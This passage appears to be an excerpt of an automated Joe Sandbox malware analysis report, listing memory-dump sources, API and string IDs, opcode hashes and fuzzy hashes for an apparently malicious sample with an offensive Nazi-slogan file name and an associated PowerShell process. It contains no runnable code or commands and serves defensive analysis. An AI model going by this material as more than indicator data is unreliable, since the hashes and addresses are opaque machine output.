                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007E2002
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\rand\randfile.c$Filename=
                                                                                                                                                                                                                                            • API String ID: 1750240854-2201148535
                                                                                                                                                                                                                                            • Opcode ID: 6b3b0f7a3795f012e9ff1fc1ebc767fdf81fc92d56402ad81cac52365df12dad
                                                                                                                                                                                                                                            • Instruction ID: dea53edd868a1f6cdd0dfcead8c6c8f67e45dbd49bbaf74c7e9ed727bf7152ff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b3b0f7a3795f012e9ff1fc1ebc767fdf81fc92d56402ad81cac52365df12dad
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6531A166F0968782FB24DB12E420BAA6750FF44788F444135EA6D476EDEF3CE604C700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$System$File
                                                                                                                                                                                                                                            • String ID: gfff
                                                                                                                                                                                                                                            • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                            • Opcode ID: f6e690c008a50fba309e4810556e3a08f0a38e0289250941bf64fab63e84ad4b
                                                                                                                                                                                                                                            • Instruction ID: 46f646b904b250eae01b2704aad1453db3afea6d4672d8031419b33a8cef1f01
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6e690c008a50fba309e4810556e3a08f0a38e0289250941bf64fab63e84ad4b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4421E97270468786DB58DF29E52077977E0EB88788F44C075EA6ECB798DE3DD0408700
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_sess.c$T
                                                                                                                                                                                                                                            • API String ID: 0-2647723609
                                                                                                                                                                                                                                            • Opcode ID: 2738ae770119198ad7c47fd9ebfa88edacb67cbaab7b8918c68778f86e0758ed
                                                                                                                                                                                                                                            • Instruction ID: 338a95149e73a5cb6f7f55089dad51280add143d5e8efb10b1059304ca38ef12
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2738ae770119198ad7c47fd9ebfa88edacb67cbaab7b8918c68778f86e0758ed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6021A230B1864282FB08AB61D865BE976D0EF44744F8440B6EA1E477C9EF7EE504CB10
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
• Instruction ID: 8eb12bc165134f41b4cb3792588da0e60e246dae2e205a758614a1fe4bf5d5fe
• Opcode Fuzzy Hash: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
• Instruction Fuzzy Hash: 44212372A1868181EB308F51D44627D73B5FB88B84F864335DAADAB394DF7CE9849B40
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
• Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: 00007E13331210
• String ID: ..\s\ssl\statem\extensions_srvr.c$3
• API String ID: 1677897744-3555168737
• Opcode ID: 02e4923c65d91dd17ed78d59ecd45d247cd09b3b530dfdedfddf0ce4932c12f5
• Instruction ID: 4aaf6d1f1a2284394ea3e7c0bcd53cbe8c70bb95c485e494ffeef84d8d24bb01
• Opcode Fuzzy Hash: 02e4923c65d91dd17ed78d59ecd45d247cd09b3b530dfdedfddf0ce4932c12f5
• Instruction Fuzzy Hash: C921E032708B4082EB599B11E850BAC63A4EB44B88F584131DE6D4BBD8DF7ED6D0C700
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
• Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
Similarity
• API ID: FeaturePresentProcessorcapture_previous_context
• String ID: _/yZ_&
• API String ID: 3936158736-2545492802
• Opcode ID: 935020ce459c276dd974af6d112d96968beece1e2f635116ef2f32d11577830a
• Instruction ID: 751945263df847d3f5981b4db20ae78c53b958117ca9646a57799d6d8ddee9b6
• Opcode Fuzzy Hash: 935020ce459c276dd974af6d112d96968beece1e2f635116ef2f32d11577830a
• Instruction Fuzzy Hash: 42211565B1CB0681EB48AB04E871BA533A0FB84344F9005B5D9AE833E9EF3EA445C710
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
• Instruction ID: 761cba639d03aea86463388cd1ad425dde15df9ba6ee47ac9c00dac230985bb0
• Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
• Instruction Fuzzy Hash: 2A115B32608B8182EB218F55E400269B7E8FB88B98F584330EF9D5B769DF3CE5518B00
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
• Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
Similarity
• API ID: FeaturePresentProcessorcapture_previous_context
• String ID: _/yZ_&
• API String ID: 3936158736-2545492802
• Opcode ID: 57662b103b31dcb68621f42d09298142627021673d1d758453386178e6d091d8
• Instruction ID: 931c2b580d7e535fc72d1067fb83a277f75332a0b0d0fdb81fee83fc31f3fd6e
• Opcode Fuzzy Hash: 57662b103b31dcb68621f42d09298142627021673d1d758453386178e6d091d8
• Instruction Fuzzy Hash: BB110475B2CB0A81EB48AB04E860BA577A4FB84344F5015B5D9AE873E9EF3EE445C710
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
                                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                            • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                            • Instruction ID: 09a25edd1726398f407d017423dcdbbfe3ab10e57d17ce13637819520ad46471
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F01A26291C30386F720AFE0A86327E63A0EF48744F801236D55DEA795EF3CE544AB14
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$System$File
                                                                                                                                                                                                                                            • String ID: gfff
                                                                                                                                                                                                                                            • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                            • Opcode ID: 38bc638285714f8673654ce0a6927bc61df2c2199d4dc0b12482ca57c550bfb1
                                                                                                                                                                                                                                            • Instruction ID: 50061fdd17cef5010d68243691cff8e7e66d8913d4d0d244437064c995684d9f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38bc638285714f8673654ce0a6927bc61df2c2199d4dc0b12482ca57c550bfb1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B101DBE2B1854582DF64DB29F81155567E0EBCC784B449131FA6DCF799EE2CD145CB00
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: /F^
                                                                                                                                                                                                                                            • API String ID: 0-3479841251
                                                                                                                                                                                                                                            • Opcode ID: 242bb73927777fc8123741619f024639760ca1e02baa843682d08969a787a0da
                                                                                                                                                                                                                                            • Instruction ID: 3706bd76530747ccf0263d5fe73297443cfffb6a37280f298c3b08715eb76cc4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 242bb73927777fc8123741619f024639760ca1e02baa843682d08969a787a0da
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6319337A0D3D15FE3274AB858760A97FE0EF5322470B01FBC4D58B1A7E919580A8761
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1843389343.00007FFD9AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ad60000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f714554864aecc260153f7d307e86fe4657869024b15c6db32d24e4e32b7779e
                                                                                                                                                                                                                                            • Instruction ID: e8adba6cbbfcaa630402c197a8e3c8de56d3b954de68efa484964b98cb3ddc49
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f714554864aecc260153f7d307e86fe4657869024b15c6db32d24e4e32b7779e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71821763B0EBC90FE7AA976858655B47FE1EF56220B0911FBD09DC71D3EE18AC068341
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1843389343.00007FFD9AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ad60000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c8e52732fd8a6b7bd690ecbe42788f8634153b04c58328071707ce2a648d2ccf
                                                                                                                                                                                                                                            • Instruction ID: 0630a1a0641d8f543e9b9bc94e597736a0eee8f3e5c1dd3d9c5d9b818316b014
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8e52732fd8a6b7bd690ecbe42788f8634153b04c58328071707ce2a648d2ccf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55D11523A0EA8A0FEB6DABA898755B57BE0EF55314B1801FFD45DC70D3EA19A805C341
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f9af5c77d1755fca45533df992584f34bab5aa384b07ac549d7a588315d330bc
                                                                                                                                                                                                                                            • Instruction ID: b2155ca60eccca588ed9aaea4edc263c766707a3bdbf93e9ee63b6d9bd93b529
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9af5c77d1755fca45533df992584f34bab5aa384b07ac549d7a588315d330bc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F831E93190D7C88FE7569BB898596A97FF0DF97320F0941EFC048C71A7DA68540AC752
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ff1fa48d92a7a32a6dab769dc0d2835d3124d04a6a99e1ceeef992504b7e285d
                                                                                                                                                                                                                                            • Instruction ID: 05501940ea198986ed40afd78a65169a2a636517c176cddf805c9d839edb55c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff1fa48d92a7a32a6dab769dc0d2835d3124d04a6a99e1ceeef992504b7e285d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7310931A1CB484FDB1C9B5C9C466B97BF0FB99310F04426FE459D3292CA70A815CBC2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841048778.00007FFD9AB7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB7D000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ab7d000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
• API String ID:
• Opcode ID: b26fc4cb9d255378ce47aa9b0f754cc0fea2f7ee98f97ee94ff34e16b8e1cb91
• Instruction ID: 33f5b0e9545d3dd2e240a5310df448735f6eaf2ee026e13b03b87939a057059f
• Opcode Fuzzy Hash: b26fc4cb9d255378ce47aa9b0f754cc0fea2f7ee98f97ee94ff34e16b8e1cb91
• Instruction Fuzzy Hash: 7F412A7150DBC44FE75A8B2898559523FF0FF52318B1905EFD08CCB5A3DA25B846C792

Memory Dump Source
• Source File: 00000007.00000002.1843389343.00007FFD9AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffd9ad60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c06a70fe52bdc1d6c7e729d1a118694b0543f2c87fa14000fdf682b19f13dcc
• Instruction ID: 28880b71c2e3c0d657577ea7a4a050137fadc286838b7516667b551bfc0e084a
• Opcode Fuzzy Hash: 1c06a70fe52bdc1d6c7e729d1a118694b0543f2c87fa14000fdf682b19f13dcc
• Instruction Fuzzy Hash: F321F263B5EA874FE7BDDA68956117436C1EF94220B6920FAD05EC3192EE18EC008301

Memory Dump Source
• Source File: 00000007.00000002.1843389343.00007FFD9AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffd9ad60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c3623a56cde72aaabf2761740d7503b7454d46f747e91277bb9be2c9252a8614
• Instruction ID: 671952a925bd7ee1417b24c532e9af7ad26fc81c934bbd11c85257823ae45679
• Opcode Fuzzy Hash: c3623a56cde72aaabf2761740d7503b7454d46f747e91277bb9be2c9252a8614
• Instruction Fuzzy Hash: FD11C273F0E6864FE7B9D7AC95706B47BD0EF05220B5910FAD06DC7096EA19AC048341

Memory Dump Source
• Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction ID: a5f17bad871621e14cb7fe71e574200b6c9bd4a44935e4134c7ef33be96b6135
• Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction Fuzzy Hash: E401A73124CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58AC3695DB32E882CB45

Memory Dump Source
• Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 62b22bd3904e7e9b078f00f090f48a220d18b4255540163dc55495c244192f83
• Instruction ID: 5eb9f6d05fef8e7933e91e79e3e3aaedf76681fb4bf6550818f96d0af60ffcdd
• Opcode Fuzzy Hash: 62b22bd3904e7e9b078f00f090f48a220d18b4255540163dc55495c244192f83
• Instruction Fuzzy Hash: 0001817A90EBC94FDB579F2898750987FB0EF6620170902DBD098CB0A3E6659908C792

Strings
Memory Dump Source
• Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
Similarity
• API ID:
• String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^
• API String ID: 0-3904786266
• Opcode ID: 62a1ff498abc061122313bf249bdf9155b1d656eca352150b7fb9c41c8f7bd70
• Instruction ID: 95e8481cc3dc03f09f5062f3aa758ba99c3c7cc161dd46cb40a196c3438688ee
• Opcode Fuzzy Hash: 62a1ff498abc061122313bf249bdf9155b1d656eca352150b7fb9c41c8f7bd70
• Instruction Fuzzy Hash: CB215366D0DAC18EE36B626558B81A43BE05F92344F4E51FBD4B89B1E7F809580D8392

Strings
Memory Dump Source
• Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
Similarity
• API ID:
